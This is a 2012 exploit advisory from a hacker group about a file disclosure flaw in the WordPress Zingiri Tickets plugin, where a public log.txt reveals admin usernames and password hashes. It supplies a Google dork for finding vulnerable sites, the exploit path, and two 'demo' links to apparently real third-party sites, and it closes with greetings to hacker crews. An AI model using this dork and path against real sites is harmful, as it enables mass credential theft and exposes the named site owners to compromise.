The WordPress Zingiri Tickets plugin suffers from a file disclosure vulnerability that holds administrative username and password hashes.
892b3d05968e8c76e93a0c032ea0704ecd6db0ee18f2a3afcc6db8d331fc0efb
##########################################################################
# Title : WordPress Plugin Zingiri Tickets #
# Author: MadLeeTs #
# Greets: Shadow008,1337,Invectus,pSyCh0_3D,KhanTastiC,MadBuGz,H4x0rL1f3 #
# Vendor: http://www.zingiri.com/plugins-and-addons/tickets/ #
# Email : h4x0rl1f3@gmail.com WwW.MadLeeTs.CoM
<http://www.madleets.com/>
#
# Date : 17/04/2012 #
# Dork : "/wp-content/plugins/zingiri-tickets" #
# Category : PHP [Local File Disclosure] #
# Tested on: [Windows 7, Linux Ubuntu] #
##########################################################################
Exploit
This vulnerbility affects very high because it shows you Admin username
and password hashes.
[localhost]/[path]/wp-content/plugins/zingiri-tickets/log.txt
Demo 1
http://www.hms69.com/wp-content/plugins/zingiri-tickets/log.txt
Demo 2
http://www.ranahost.com/wp-content/plugins/zingiri-tickets/log.txt
Regards to www.cyberarmy.com.pk & www.c0d3rz.com
##########################################################################